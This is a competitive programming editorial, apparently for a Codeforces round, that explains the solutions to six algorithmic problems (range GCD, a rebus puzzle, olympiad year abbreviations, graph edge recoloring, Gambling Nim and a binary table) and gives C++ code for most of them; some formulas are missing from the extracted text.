null into C# methods and trigger a different behavior. This can lead to errors in future code where you are now accessing something that inadvertently is a
null object.
In C# 8, the langauge designers introduced a feature called Nullable Reference Types that allows you to define which variables could be null and which variables should NEVER be null.
In this article, and as an effort to help make myself a better programmer, we're going to review the nullable Reference Types feature of C# and discuss why it is an important feature that we should start using by default in our applications.
Why null?
As an object oriented language, C# has always had the concept of
null in code. null is the absence of an object, its synonymous with "nothing" and is an easy concept for folks to understand when you declare a variable. However, this can (and most likely WILL) lead to the dreaded
NullReferenceException, an error that indicates a
null object was acted on unexpectedly.
PRO TIP: Sometimes, you'll hear C# programming folks refer to a
NullReferenceException as an NRE.
Logger myConsoleLogger = default(ILogger); myConsoleLogger.LogInformation("Processed the data");
In the sample above, the
myConsoleLogger object is declared and assigned its default value (which is null). This would trigger a
NullReferenceException because
myConsoleLogger was never assigned an instance of an object. This is a simple mistake, but it would be really nice if the compiler caught this before we even tried to run the code. Consider a scenario like this array:
string[] values = new string[3]; string firstValue = values[0]; Console.WriteLine(firstValue.ToLower());
This is going to throw a
NullReferenceException also, because the
values array is declared but never assigned values. The
firstValue variable is initialized with a
null value on line 2 and the
ToLower() method is then attempting to operate on a
null object. Once again, a simple error because the
values array is never assigned values.
Nullable Contexts and Compiler Warnings to the Rescue!
Some folks fear the compiler. There's a feeling that the compiler throwing errors or emitting warnings is an intimidating practice. I see it the other way: The compiler is my friend telling me when I made a mistake before I attempt to run my application. In this case, I want the compiler to tell me when I might work with a
null object because the variables weren't initialized properly. Let's get some help to ensure that our objects in our code are being used correctly.
By default in C#, any reference type can be assigned the
null value. With C# 8 and .NET Core 3.0 and later, we can define contexts in and around our projects where the compiler will perform nullability checks and raise warnings if we are potentially going to throw a
NullReferenceException.
We can enable nullable checking on a segment of code by wrapping it with a compiler pre-processor
#nullable with a setting the indicates how it should behave. Let's add nullability checking to the
Hat class I introduced in the previous post in this series:
#nullable enable public class Hat { public string Name { get; set; } public int AcquiredYear { get; set; } public string Theme { get; set; } } #nullable restore
There are two pre-processor commands present in this code:
#nullable enable and
#nullable restore. The
enable command tells the compiler to check for variables that could be inadvertently assigned null and raise a compiler warning if there are any. Sure enough, in the
Hat class, the string properties
Name and
Theme need to be initialized according to these compiler warnings:
warning CS8618: Non-nullable property 'Name' must contain a non-null value when exiting constructor. Consider declaring the property as nullable. warning CS8618: Non-nullable property 'Theme' must contain a non-null value when exiting constructor. Consider declaring the property as nullable.
This are easy fixes as I can default the values for these two properties to
string.Empty:
#nullable enable public class Hat { public string Name { get; set; } = string.Empty; public int AcquiredYear { get; set; } public string Theme { get; set; } = string.Empty; } #nullable restore
The compiler warnings go away, and I am a happy developer. If I try to define a
Hat and assign
null to these fields, will the compiler catch it?
var newHat = new Hat { Name="Phillies 80's Maroon", AcquiredYear=1985, Theme=null };
This code DOES compile with no warnings. Why? The
#nullable compiler directive is set on the
Hat class, not the construction of the
newHat variable. In order to protect more of our code, we need to expand the nullable check's scope to include more of our code.
#nullable enable var newHat = new Hat { Name="Phillies 80's Maroon", AcquiredYear=1985, Theme=null }; #nullable restore
This raises the appropriate compiler warning:
warning CS8625: Cannot convert null literal to non-nullable reference type.
Let's review quickly: these are ONLY compiler warnings. In fact, this code will run and not produce any errors.
Declaring a Reference Type as Nullable
I can also tell the compiler that it's ok if one of these reference values is assigned null by attaching a
? to the end of it's variable declaration:
public class Hat { public string? Name { get; set; } public int AcquiredYear { get; set; } public string Theme { get; set; } = string.Empty; }
With this change, the
Name of the hat is allowed to be assigned
null regardless of the Nullable context around the class.
Project-wide Nullable Checking
What if I want to roll-out this compiler interaction across my ENTIRE project. You can add an entry to your project file that indicates nullable checking should be enabled with the
Nullable element:
<Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <OutputType>Exe</OutputType> <TargetFramework>net5.0</TargetFramework> <Nullable>enable</Nullable> </PropertyGroup> </Project>
We can now remove the
#nullable directives from the
Hat class and I'll receive the same compiler warnings without writing more code.
Disable Nullable Checking
What if I have an application that is configured with the
Nullable entry in the project file, and I want to relax the checking on various sections of my application?
Similar to before, we can add a processor directive to our code that disables null checking:
#nullable disable var newHat = new Hat { Name="Phillies 80's Maroon", AcquiredYear=1985, Theme=null }; #nullable restore
Now we're talking... I can enforce the better developer behavior by adding the Nullable check to my project file, and those developers that want to take the risk of assigning and working with
null can wrap their code with the processor to remove the warnings.
The Final Step
Warnings are just silly yellow text the compiler emits that tells us we MIGHT have a concern in our project. Did you know that you can turn up the importance of this warnings, converting them to errors the compiler emits and ensuring that you write better code? Add the
TreatWarningsAsErrors element to your project file and those pesky warnings become a real problem that blocks your project from compiling properly:
<Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <OutputType>Exe</OutputType> <TargetFramework>net5.0</TargetFramework> <Nullable>enable</Nullable> <TreatWarningsAsErrors>true</TreatWarningsAsErrors> </PropertyGroup> </Project>
Now our project team will be forced to treat
null values with more respect.
Summary
The ability to assign and work with the
null value is valuable in C#, but can be misused and lead to errors in our running applications. Let's get some help from the compiler to make handling of
null values easier and clearer when we're building our projects.
Did you know, I host a weekly live stream on the Visual Studio Twitch channel teaching the basics of C#? Tune in on Mondays at 9a ET / 1300 UTC for two hours of learning in a beginner-friendly Q+A format with demos and sample code you can download.
Looking to get started learning C#? Checkout our free on-demand courses on Microsoft Learn!
Discussion (0) | https://dev.to/dotnet/my-favorite-c-features-part-3-nullability-2mcg | CC-MAIN-2021-21 | refinedweb | 1,386 | 52.19 |
Programming
If you don't know what this is, you don't need it
A package that depends/installs all the hotfixes and updates in Extras that have not (yet) been made part of a firmware update, currently containing . * QtQuick compat - alllow import QtQuick 1.0 * Bearer hotfix - fix loading of resources over network
Votes: 0
Integrated Developer Environment for .NET
MonoDevelop is a IDE primarily designed for C# and other CLI (.NET) languages..
=== Use Fn-Tap for right clicks ===
Votes: 2
Makes 'QtQuick 1.0' QML namespace available in Qt 4.7.0
Version 4.7.1 of Qt / the QtDeclarative module introduces a new default namspace for its basic types: 'QtQuick 1.0'. The originaly namespace 'Qt 4.7' still works, but is deprecated. This package installs a 'compatibility' plugin to Qt 4.7.0 that re-registers all 'Qt 4.7' types in the new namespace. Note that this isn't officially endorsed: You should rather fix your imports if you target 4.7.0. Anyhow, this plugin can be handy to quickly try out e.g. newer Qt examples & demos on the device. | http://maemo.org/downloads/Maemo5/development/?org_openpsa_qbpager_org_openpsa_products_product_dba_page=2 | CC-MAIN-2013-20 | refinedweb | 187 | 69.38 |
Agenda
See also: IRC log
<trackbot> Date: 13 June 2012
<scribe> scribe: John_Boyer
Steven: CMS company, very
enthusiastic about XForms
... They have an XForms implementation with some very nice features
... a whole workplace, an xform rendition, validation area, etc.
... They have a design tool. They can also can convert an HTML form to XForms with copy-paste ease
... They want to be a member of the working group
... working on OK from their management
... They also want to do a workshop on XForms business and/or government
John: Thanks Steven, that is a great and motivating report, Thanks for visiting them
<Steven>
Steven: can we resolve this namepace change?
RESOLUTION: Functions go into XForms (2003) namespace
<Steven>
<nvdbleek>
<Steven> Nick: Is it allowed on insert as well?
<Steven> ... you did it for header, var and bind?
<Steven> John: Yes
<Steven> Nick: Why not on actions?
<Steven> John: We're trying to ensure data doesn't travel between models
<Steven> ... a var makes the variable available in the model, but if a var can point to other vars, it can bring values from other models
<Steven> ... we should discuss this
<Steven> John: There's a non-normative note about actions
Nick: Why isn't model allowed on var?
<Steven> Erik: What about dispatch?
<Steven> Nick: dispatch could mix models
<Steven> John: But there's no cross-model data-dependency
John_Boyer: var would then consume data from one model and pull it into another model
<Steven> ... didn't we already have that problem?
John_Boyer: in the past we've had this rule of thumb to avoid creating cross-model data dependencies
<nvdbleek>
John_Boyer: When model is used on an insert, delete or setvalue, it resets the context of the whole action
<Steven> John_Boyer: We may need to create more restrictions to handle those
John_Boyer: It sounds pretty safe that children of dispatch could bind to different models because the result is an event
Nick: Not sure why there is a limitation on switching models with var
John_Boyer: I could see removing the restriction on both var and header; the real issue was crossing models on the bind element due to cross-model dependencies
Erik: Would actions within the model have any restrictions? I think they don't
RESOLUTION: Remove restriction on model from header and var, leave restriction to current model on bind element
<scribe> ACTION: Nick to Remove restriction on model from header and var, leave restriction to current model on bind element [recorded in]
<trackbot> Created ACTION-1906 - Remove restriction on model from header and var, leave restriction to current model on bind element [on Nick Van Den Bleeken - due 2012-06-20].
John_Boyer: Erik I agree no
restrictions on model attributes of actions in a model, neither
before nor now
... Only other thing I did was change description of rebuild, recalculate, revalidate, refresh and reset, which used to have model as special attributes
<Steven>
Steven: This is now done
Nick: yes I think we agreed to that, but there is a lot of work in the spec to do that
Erik: My concern is that I don't yet know what to implement, and all that needs to be specified
John_Boyer: Do we need Alain to give us a description of what got implemented for load/@show=embed?
Nick: input from community group?
Alain: Yes we implemented, and the implementation is compatible with betterForm. BetterForm has some extension functions that XSLTForms doesn't implement, but the baseline is there.
Erik: It would help to have an email with a few bullet points to describe implementation issues like what to do with IDs, events, models, etc.
<scribe> ACTION: Alain to send email to working group with further implementation details for load/@show=embed that describes how the implementation works and how it handles issues like IDs, event propagation, embedded models, etc. [recorded in]
<trackbot> Created ACTION-1907 - Send email to working group with further implementation details for load/@show=embed that describes how the implementation works and how it handles issues like IDs, event propagation, embedded models, etc. [on Alain Couthures - due 2012-06-20].
Alain: it is very useful to have load/@show=embed for subforms
Steven: Any other spec review issues?
Nick: There was an override
issue, but it could be covered after FPWD
... I added an override feature for XPath functions, like what is in XSLT
Erik: You can implement a
function in XSLT to make sure an implementation is there, and
override lets you decide whether to let a native implementation
override or override the native implemenation with the one in
the XSLT
... Not sure the override feature is critical for XForms, but it is in XSLT
... Could ask Michael Kay what he thinks about the value of the override feature
... We have to weigh value versus implementation difficulty
John_Boyer: Is it a security
problem to let a document arriving and overriding functions in
the native implementation?
... I mean, when the XForm is running in the browser.
Nick: XSLT has the same
problem
... When running in a browser
<nvdbleek> Nick: An implementation may have a custom function that isn't behaving as the form expects, in those cases it is desirable to override the function
Erik: an implementation won't let you crush a native implementation. It's a local change
John_Boyer: I don't understand; does the override feature specify that it only makes a local change?
<nvdbleek> Nick: Another use case is that you specify the function in both script and native xforms and don't wan't to override the script version if the processor supports the script language
Erik: No, an overriding function in an xform could override a function provided by the xforms processor
<nvdbleek> but only extension functions, not functions in the XForms namespace nor in the xpath function namespace
John_Boyer: It seems off that an xforms processor defined function could be overridden
Erik: We could say that override only applies to extension functions, not those in xforms
Steven: Does it make sense to ask Michael Kay?
John_Boyer: Yes, although he
probably doesn't do much with digitally signing XSLT.
... makes sense to ask Michael about the value to XSLT of the override
Steven: need a resolution about FPWD. Any objections?
All: no
RESOLUTION: Publish FPWD of XForms 2.0 and XPath Expression module
hmm, what's taking zakim so long?
This is scribe.perl Revision: 1.136 of Date: 2011/05/12 12:01:43 Check for newer version at Guessing input format: RRSAgent_Text_Format (score 1.00) Succeeded: s/* Topic/Topic/ Succeeded: s/teh/the/ Succeeded: s/TH/Th/ Succeeded: s/made/may/ Succeeded: s/Topic: Spec review// Succeeded: s/down/done/ Found Scribe: John_Boyer Inferring ScribeNick: John_Boyer Default Present: +44.782.483.aaaa, +1.323.425.aabb, nvdbleek, +1.650.919.aacc, ebruchez, Steven, Philip, alain Present: +44.782.483.aaaa +1.323.425.aabb nvdbleek +1.650.919.aacc ebruchez Steven Philip alain John_Boyer Regrets: Kurt Agenda: Found Date: 13 Jun 2012 Guessing minutes URL: People with action items: alain nick WARNING: Input appears to use implicit continuation lines. You may need the "-implicitContinuations" option.[End of scribe.perl diagnostic output] | http://www.w3.org/2012/06/13-forms-minutes.html | CC-MAIN-2015-06 | refinedweb | 1,194 | 58.92 |
Investors considering a purchase of VEREIT Inc (Symbol: VER) shares, but tentative about paying the going market price of $7.17/share, might benefit from considering selling puts among the alternative strategies at their disposal. One interesting put contract in particular, is the January 2018 put at the $5 strike, which has a bid at the time of this writing of 65 cents. Collecting that bid as the premium represents a 13% return against the $5 commitment, or a 6.7% annualized rate of return (at Stock Options Channel we call this the YieldBoost ).
Selling a put does not give an investor access to VER VEREIT Inc sees its shares fall 30.2% and the contract is exercised (resulting in a cost basis of $4.35 per share before broker commissions, subtracting the 65 cents from $5), the only upside to the put seller is from collecting that premium for the 6.7% annualized rate of return.
Below is a chart showing the trailing twelve month trading history for VEREIT Inc, and highlighting in green where the $5 strike is located relative to that history:
The chart above, and the stock's historical volatility, can be a helpful guide in combination with fundamental analysis to judge whether selling the January 2018 put at the $5 strike for the 6.7% annualized rate of return represents good reward for the risks. We calculate the trailing twelve month volatility for VEREIT Inc (considering the last 253 trading day closing values as well as today's price of $7.17) to be 25%. For other put options contract ideas at the various different available expirations, visit the VER Stock Options page of StockOptionsChannel.com.
In mid-afternoon trading on Thursday, the put volume among S&P 500 components was 1.18M contracts, with call volume at 1.19M, for a put:call ratio of 0.99. | https://www.nasdaq.com/articles/commit-purchase-vereit-5-earn-13-using-options-2016-02-11 | CC-MAIN-2021-25 | refinedweb | 313 | 62.27 |
This tutorial is a follow-up to Tutorial: How To Scrape Amazon Product Details and Pricing using Python, by extending the Amazon price data to also cover product reviews. The scope of this tutorial is limited to web scraping an Amazon product page to retrieve review summary and the first page of customer reviews for any product from Amazon.
Scraping Customer Reviews from Amazon can be useful for
- Getting complete review details that you can’t get with the Amazon Product Advertising API.
- Monitoring customer opinion on products that you sell or manufacture using Data Analysis
- Create Amazon Review Datasets for Educational Purposes and Research
Amazon used to provide access to product reviews through their Product Advertising API to developers and sellers, a few years back. They discontinued that on November 8, 2010, preventing customers from displaying Amazon reviews about their products, embedded in their websites. As of now, Amazon only returns a link to the review.
Take a look at the screenshot below, from a StackOverflow thread on the same topic.
We were able to find few tutorials on doing this using Perl ( ). Being the Python Enthusiasts, we are ( check out the other web scraping tutorials we have published before), we thought of making one using simple Python and the simple python library – LXML.
We’ll follow this post up with a tutorial on how to turn this code into a web API that you can use or integrate with your projects.
Requirements
For this web scraping tutorial using Python 3, we will need some packages for downloading and parsing the HTML. Below are the package requirements.
Install Python 3 and Pip
Here is a guide to install Python 3 in Linux –
Mac Users can follow this guide –
Windows Users go here –
Install Packages
- PIP to install the following packages in Python ()
- Python Requests, to make requests and download the HTML content of the pages ().
- Python LXML, for parsing the HTML Tree Structure using Xpaths (Learn how to install that here –)
- Python Dateutil, for parsing review dates ( )
Let us get our hands dirty now.
The Code
Here is the GIST link for the code above
If you would like the code in Python 2.7, you can check this link –.
Modify the code below. Add your own ASINs to the line.
AsinList = ['B01ETPUQ6E','B017HW9DEW'] If you are getting banned by Amazon, try increasing the delay from 5 seconds by editing the line
sleep(5)
. Increase to say 10 seconds.
sleep(10)
def ReadAsin(): #Add your own ASINs here AsinList = ['B01ETPUQ6E','B017HW9DEW'] extracted_data = [] for asin in AsinList: print "Downloading and processing page"+asin extracted_data.append(ParseReviews(asin)) sleep(5) f=open('data.json','w') json.dump(extracted_data,f,indent=4)
Once you are done modifying the script, run this script using Python 3 in a Terminal or Command Prompt. We named our file `amazon_review_scraper.py`.
python amazon_review_scraper.py
Once the script completes running, you can see a file called data.json, with the reviews data in a JSON format.
Below is the formatted output we received for the ASINs we supplied
Here is the full output attached in a GIST.
This code should work for a relatively small number of ASINs for your personal projects, but if you want to scrape websites for thousands of pages, learn about the challenges here Scalable do-it-yourself scraping – How to build and run scrapers on a large scale.
Thanks for reading and if you need help with your complex scraping projects let us know and we will be glad to help.
Do you need some professional help to scrape Amazon Data? Let us know
Turn the Internet into meaningful, structured and usable data
21 comments on “How to scrape Amazon Reviews using Python”
This script does not seem to work. The json written does not have any views in it.
Please copy the detailed error or how you ran this so we can check.
Thanks
how to increase the number of reviews obtained ??
Hi Arjun – that’s what’s called “an exercise left to the reader”. You will have to look at the pagination – click that and then get the next page and so on. Most likely you will get blocked pretty soon.
The ratings dictionary is very helpful for getting the percentage distributions of the reviews based on the number of stars, however is there an easy way to see the total number of reviews? For example, are those percentages based on 11 reviews or 3,000? Thanks!
I’m not very familiar with lxml so I think that’s where the I’m getting stuck
Hi,
I don’t think it’s working. Can you help me fix it? This is the output of the json file:
[
{
“error”: “failed to process the page”,
“asin”: “B01ETPUQ6E”
},
{
“error”: “failed to process the page”,
“asin”: “B017HW9DEW”
}
]
Thank you!
Could be an IP block?
Not showing all reviews. Any ideas ? My products have alot of reviews and the total result after i used the script isnt even close to that.
This script doesn’t get you all reviews. It was written specifically to demonstrate scraping reviews using Python, and was never intended as a fully functional scraper for thousands of pages.
I ran the code on Jupyter. The code ran without any error but I am not getting any output file.
When using in Jupyter Notebook, you should call the function
ParseReviewswith your ASIN.
For example,
ParseReviews(`B01ETPUQ6E`)would return a dict similar to
I am quite new to Python so apologies for any ignorance. I am getting a urllib3 InsecureRequestWarning, even after following the instructions here:
InsecureRequestWarning. Any thoughts as to why? I am using Jupyter, Python version 2.7.
Any idea why I would be getting this warning: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See:
InsecureRequestWarning) ? I followed the instructions on the urllib3 page but am still getting the same warning. I am in Jupyter (python 2). Thank you!
Love what you guys are doing, big fan of yours. I am currently collecting emails of Amazon reviewers and it’s a very time consuming process. If you could help me with a code for doing this it would be awesome and thank you for reading all of this.
Sorry we can’t write code on demand but you can hire someone on upwork to do all this.
I keep getting the error “unable to find reviews in page”, what could be the problem? [ I promise the product has reviews ]
The HTML parser seemed to have a depth limit. It wont traverse further to parse the text if the depth exceeds 254. We have updated our code to handle this.
We found Amazon sending null bytes along with the response in some cases which caused the Lxml parser failure. Our code base is now updated.
how would we get like 100 reviews off the site?
You would need to find the link to next page of reviews and parse it similarly as in this tutorial | https://www.scrapehero.com/how-to-scrape-amazon-product-reviews/ | CC-MAIN-2018-51 | refinedweb | 1,169 | 72.05 |
664A - Complicated GCD
Author of the idea — GlebsHP
We examine two cases:
- a = b — the segment consists of a single number, hence the answer is a.
- a < b — we have gcd(a, a + 1, a + 2, ..., b) = gcd(gcd(a, a + 1), a + 2, ..., b) = gcd(1, a + 2, ..., b) = 1.
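The second case can be sanity-checked with a few lines of C++ (an illustration only, not part of the solution; std::gcd requires C++17):

```cpp
#include <cassert>
#include <numeric>

// Compute gcd(a, a + 1, ..., b) directly. For any a < b it collapses to 1
// at the very first step, since gcd(a, a + 1) = 1 for every positive a.
long long range_gcd(long long a, long long b) {
    long long g = a;
    for (long long x = a + 1; x <= b; x++)
        g = std::gcd(g, x);
    return g;
}
```

For example, range_gcd(4, 10) evaluates to 1, while range_gcd(7, 7) returns 7, matching the two cases above.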
#include <bits/stdc++.h>
using namespace std;

int main() {
    string a, b;                 // a and b can be huge, so read them as strings
    cin >> a >> b;
    if (a == b)
        cout << a;               // a single number: the answer is the number itself
    else
        cout << 1;               // a < b: gcd(a, a + 1) = 1 already
    return 0;
}
663A - Rebus
First we check whether any solution exists at all. For that purpose, we calculate the number of positive (the first one and any other with the + sign) and negative elements (with the - sign) in the sum. Let them be pos and neg, respectively. Then the minimum value of the sum that can possibly be obtained is min = 1 · pos - n · neg, since each positive element can take value 1 while each negative element can take value n (contributing -n). Similarly, the maximum possible value is max = n · pos - 1 · neg. A solution therefore exists if and only if min ≤ n ≤ max.
Now suppose a solution exists. Let's insert the numbers into the sum one by one from left to right. Suppose that we have determined the numbers for some prefix of the expression, with sum S. Let the sign of the current unknown be sgn (+1 or -1), and let there be some unknown numbers left to the right of it (excluding the current unknown itself): pos_left positive and neg_left negative. Suppose that the current unknown takes value x. How do we find out whether this can lead to a solution? The answer is: in the same way we checked it in the beginning. Examine the smallest and the largest values of the total sum that we can still get. These are min_left = S + sgn · x + pos_left - n · neg_left and max_left = S + sgn · x + n · pos_left - neg_left, respectively. We may set the current number to x if min_left ≤ n ≤ max_left holds. To find a value of x, we could solve a system of inequalities, but it is easier simply to check all possible values from 1 to n.
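The greedy above can be sketched as a standalone function. The names (solveRebus, signs) are ours, not from the reference code, and 64-bit arithmetic is used for the bound checks:

```cpp
#include <cassert>
#include <vector>

// signs[i] is +1 or -1 for the i-th unknown. Returns the chosen values,
// or an empty vector if the rebus is infeasible.
std::vector<int> solveRebus(const std::vector<int>& signs, int n) {
    int pos = 0, neg = 0;
    for (int s : signs) (s == 1 ? pos : neg)++;
    if (pos - (long long)n * neg > n || (long long)n * pos - neg < n)
        return {};                       // n lies outside [min, max]
    std::vector<int> vals;
    long long S = 0;                     // sum fixed so far
    for (int sgn : signs) {
        (sgn == 1 ? pos : neg)--;        // unknowns remaining to the right
        for (int x = 1; x <= n; x++) {
            long long lo = S + (long long)sgn * x + pos - (long long)n * neg;
            long long hi = S + (long long)sgn * x + (long long)n * pos - neg;
            if (lo <= n && n <= hi) {    // x keeps the rest of the rebus feasible
                vals.push_back(x);
                S += (long long)sgn * x;
                break;
            }
        }
    }
    return vals;
}
```

For signs (+, +, -) and n = 2 this returns an assignment such as 1 + 2 - 1 = 2; for a rebus like ? - ? - ? = 1000000 it correctly reports infeasibility.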
BONUS Let k be the number of unknowns in the rebus. Prove that the complexity of the described solution (implementation shown below) is O(k^2 + n), not O(k · n).
#include <bits/stdc++.h>
using namespace std;

char s[100];

int main() {
    int k = 0, n, pos = 1, neg = 0;
    while (true) {
        char c;
        scanf(" %c", &c);                // the '?' placeholder
        scanf(" %c", &c);                // the operator after it, or '='
        if (c == '=')
            break;
        if (c == '+')
            pos++;
        if (c == '-')
            neg++;
        s[k++] = c;
    }
    scanf("%d", &n);
    if (pos - n * neg > n || n * pos - neg < n) {
        printf("Impossible\n");
        return 0;
    }
    printf("Possible\n");
    int S = 0;
    for (int i = 0; i < k; i++) {
        int sgn = 1;
        if (i > 0 && s[i - 1] == '-')
            sgn = -1;
        if (sgn == 1) pos--;
        if (sgn == -1) neg--;
        for (int x = 1; x <= n; x++)
            if (S + x * sgn + pos - n * neg <= n && S + x * sgn + n * pos - neg >= n) {
                printf("%d %c ", x, s[i]);
                S += x * sgn;
                break;
            }
    }
    // the last unknown is forced: S + sgn * x = n, hence x = |n - S|
    printf("%d = %d\n", abs(n - S), n);
    return 0;
}
662D - International Olympiad
Author of the idea — Alex_2oo8
Consider the abbreviations that are given to the first Olympiads. The first 10 Olympiads (from year 1989 to year 1998) receive one-digit abbreviations (IAO'9, IAO'0, ..., IAO'8). The next 100 Olympiads (1999 - 2098) obtain two-digit abbreviations, because all one-digit abbreviations are already taken, but the last two digits of 100 consecutive integers are pairwise different. Similarly, the next 1000 Olympiads get three-digit abbreviations and so on.
Now examine the inverse problem (extracting the year from an abbreviation). Let the abbreviation have k digits; then we know that all Olympiads with abbreviations of lengths (k - 1), (k - 2), ..., 1 were held before this one. The number of such Olympiads is 10^(k-1) + 10^(k-2) + ... + 10^1 = F, and the current Olympiad was one of the 10^k that followed. Therefore this Olympiad was held in a year between (1989 + F) and (1989 + F + 10^k - 1). As this segment consists of exactly 10^k consecutive natural numbers, it contains a single number whose k-digit suffix matches the current abbreviation. That number is the corresponding year.
#include <bits/stdc++.h>
using namespace std;

char s[42];

int main() {
    int n;
    scanf("%d", &n);
    while (n--) {
        scanf(" %s", s);
        int k = strlen(s + 4);           // digits after "IAO'"
        int year = atoi(s + 4);
        int F = 0, tenPow = 10;
        for (int i = 1; i < k; i++) {
            F += tenPow;
            tenPow *= 10;                // tenPow = 10^k after the loop
        }
        while (year < 1989 + F)          // the unique matching year is >= 1989 + F
            year += tenPow;
        printf("%d\n", year);
    }
    return 0;
}
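The year-recovery step can also be isolated into a small helper and checked on a few abbreviations (a sketch with our own names; the logic mirrors the solution above):

```cpp
#include <cassert>
#include <string>

// Recover the year from the digit suffix of an abbreviation
// (e.g. "15" for IAO'15).
long long iaoYear(const std::string& digits) {
    int k = digits.size();
    long long F = 0, tenPow = 10;
    for (int i = 1; i < k; i++) {
        F += tenPow;
        tenPow *= 10;                    // tenPow = 10^k afterwards
    }
    long long year = std::stoll(digits); // numeric value of the suffix
    while (year < 1989 + F)              // unique match in the 10^k-year window
        year += tenPow;
    return year;
}
```

For instance, the suffix "9" maps to 1989, "0" to 1990, "15" to 2015, and "2015" to 12015.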
662B - Graph Coloring
Author of the problem — gen
Examine the two choices for the final color separately, and pick the best option afterwards. Now suppose we want to color the edges red.
Each vertex should be recolored at most once, since choosing a vertex two times changes nothing (even if the moves are not consecutive). Thus we need to split the vertices into two sets S and T, the vertices that are recolored and the vertices that are not affected, respectively. Let u and v be two vertices connected by a red edge. Then for the color to remain red, both u and v should belong to the same set (either S or T). On the other hand, if u and v are connected by a blue edge, then exactly one of the vertices should be recolored. In that case u and v should belong to different sets (one to S and the other to T).
This problem reduces to 0-1 graph coloring, which can be solved by either DFS or BFS. As the graph may be disconnected, we need to process the components separately. If any component does not have a 0-1 coloring, there is no solution. Otherwise we need to add the smallest of the two partite sets of the 0-1 coloring of this component to S, as we require S to be of minimum size.
#include<bits/stdc++.h> using namespace std; const int MX = 100000; int n, vis[MX]; vector<pair<int, char>> G[MX]; vector<int> part[3]; bool dfs(int v, int p, char c) { if (vis[v] != 0) { return vis[v] == p; } vis[v] = p; part[p].push_back(v); for (auto x : G[v]) { if (dfs(x.first, x.second == c ? p : p ^ 3, c) == false) return false; } return true; } vector<int> solve(char c) { memset(vis, 0, sizeof vis); vector<int> ans; for (int i = 0; i < n; i++) if (vis[i] == 0) { part[1].clear(); part[2].clear(); if (dfs(i, 1, c) == false) { for (int j = 0; j < n + 1; j++) ans.push_back(-1); return ans; } int f = 1; if (part[2].size() < part[1].size()) f = 2; ans.insert(ans.end(), part[f].begin(), part[f].end()); } return ans; } int main() { int m; scanf("%d %d", &n, &m); for (int i = 0; i < m; i++) { int u, v; char c; scanf("%d %d %c", &u, &v, &c); u--; v--; G[u].emplace_back(v, c); G[v].emplace_back(u, c); } auto f = solve('R'); auto g = solve('B'); if (g.size() < f.size()) f = g; if (f.size() > n) { printf("-1\\n"); return 0; } printf("%d\\n", (int)f.size()); for (int x : f) printf("%d ", x + 1); printf("\\n"); return 0; }
662A - Gambling Nim
Author of the idea — GlebsHP
It is known that the first player loses if and only if the xor-sum of all numbers is 0. Therefore the problem essentially asks to calculate the number of ways to arrange the cards in such a fashion that the xor-sum of the numbers on the upper sides of the cards is equal to zero.
Let
and
. Suppose that the cards with indices j1, j2, ..., jk are faced with numbers of type b and all the others with numbers of type a. Then the xor-sum of this arrangement is equal to
, that is,
. Hence we want to find the number of subsets ci with xor-sum of S.
Note that we can replace c1 with
, as applying c1 is the same as applying
. Thus we can freely replace {c1, c2} with
and c2 with
. This means that we can apply the following procedure to simplify the set of ci:
- Pick cf with the most significant bit set to one
- Replace each ci with the bit in that position set to one to
- Remove cf from the set
- Repeat steps 1-5 with the remaining set
- Add cf back to the set
After this procedure we get a set that contains k zeros and n - k numbers with the property that the positions of the most significant bit set to one strictly decrease. How do we check now whether it is possible to obtain a subset with xor-sum S? As we have at most one number with a one in the most significant bit, then it tells us whether we should include that number in the subset or not. Similarly we apply the same argument for all other bits. If we don't obtain a subset with the xor-sum equal to S, then there is no such subset at all. If we do get a subset with xor-sum S, then the total number of such subsets is equal to 2k, as for each of the n - k non-zero numbers we already know whether it must be include in such a subset or not, but any subset of k zeros doesn't change the xor-sum. In this case the probability of the second player winning the game is equal to
, so the first player wins with probability
.
#include <bits/stdc++.h> using namespace std; const int size = 1000 * 1000 + 1; const int ssize = 100; int n; long long a[size], b[size]; long long ort[ssize]; long long p[ssize]; int main() { long long cur = 0ll; scanf("%d", &n); for (int i = 0; i < n; i++) { scanf("%lld%lld", &a[i], &b[i]); cur ^= a[i]; a[i] ^= b[i]; } a[n] = cur; int len = 0; for (int i = 0; i <= n; i++) { for (int j = 0; j < len; j++) { if (a[i] & p[j]) a[i] ^= ort[j]; } if (a[i]) { ort[len++] = a[i]; p[len - 1] = ((a[i] ^ (a[i] - 1)) + 1) >> 1; } } if (a[n]) { printf("1/1\\n"); } else { printf("%lld/%lld\\n", (1ll << len) - 1, (1ll << len)); } return 0; }
662C - Binary Table
Author of the idea — Alex_2oo8
First let's examine a slow solution that works in O(2n · m). Since each row can be either inverted or not, the set of options of how we can invert the rows may be encoded in a bitmask of length n, an integer from 0 to (2n - 1), where the i-th bit is equal to 1 if and only if we invert the i-th row. Each column also represents a bitmask of length n (the bits correspond to the values of that row in each of the n rows). Let the bitmask of the i-th column be coli, and the bitmask of the inverted rows be mask. After inverting the rows the i-th column will become
. Suppose that
contains
ones. Then we can obtain either k or (n - k) ones in this column, depending on whether we invert the i-th column itself. It follows that for a fixed bitmask mask the minimum possible number of ones that can be obtained is equal to
.
Now we want to calculate this sum faster than O(m). Note that we are not interested in the value of the mask
itself, but only in the number of ones it contains (from 0 to n). Therefore we may group the columns by the value of
. Let dp[k][mask] be the number of such i that
, then for a fixed bitmask mask we can calculate the sum in O(n) —
.
What remains is to calculate the value of dp[k][mask] in a quick way. As the name suggests, we can use dynamic programming for this purpose. The value of dp[0][mask] can be found in O(m) for all bitmasks mask: each column coli increases dp[0][coli] by 1. For k > 0, coli and mask differ in exactly k bits. Suppose mask and coli differ in position p. Then coli and
differ in exactly (k - 1) bits. The number of such columns is equal to
, except we counted in also the number of columns coli that differ with
in bit p (thus, mask and coli have the same value in bit p). Thus we need to subtract dp[k - 2][mask], but again, except the columns among these that differ with mask in bit p. Let
; by expanding this inclusion-exclusion type argument, we get that the number of masks we are interested in can be expressed as dp[k - 1][next] - dp[k - 2][mask] + dp[k - 3][next] - dp[k - 4][mask] + dp[k - 5][next] - .... By summing all these expressions for each bit p from 0 to n, we get dp[k][mask] · k, since each column is counted in k times (for each of the bits p where the column differs from mask).
Therefore, we are now able to count the values of dp[k][mask] in time O(2n · n3) using the following recurrence:
This is still a tad slow, but we can speed it up to O(2n · n2), for example, in a following fashion:
BONUS Are you able to come up with an even faster solution?
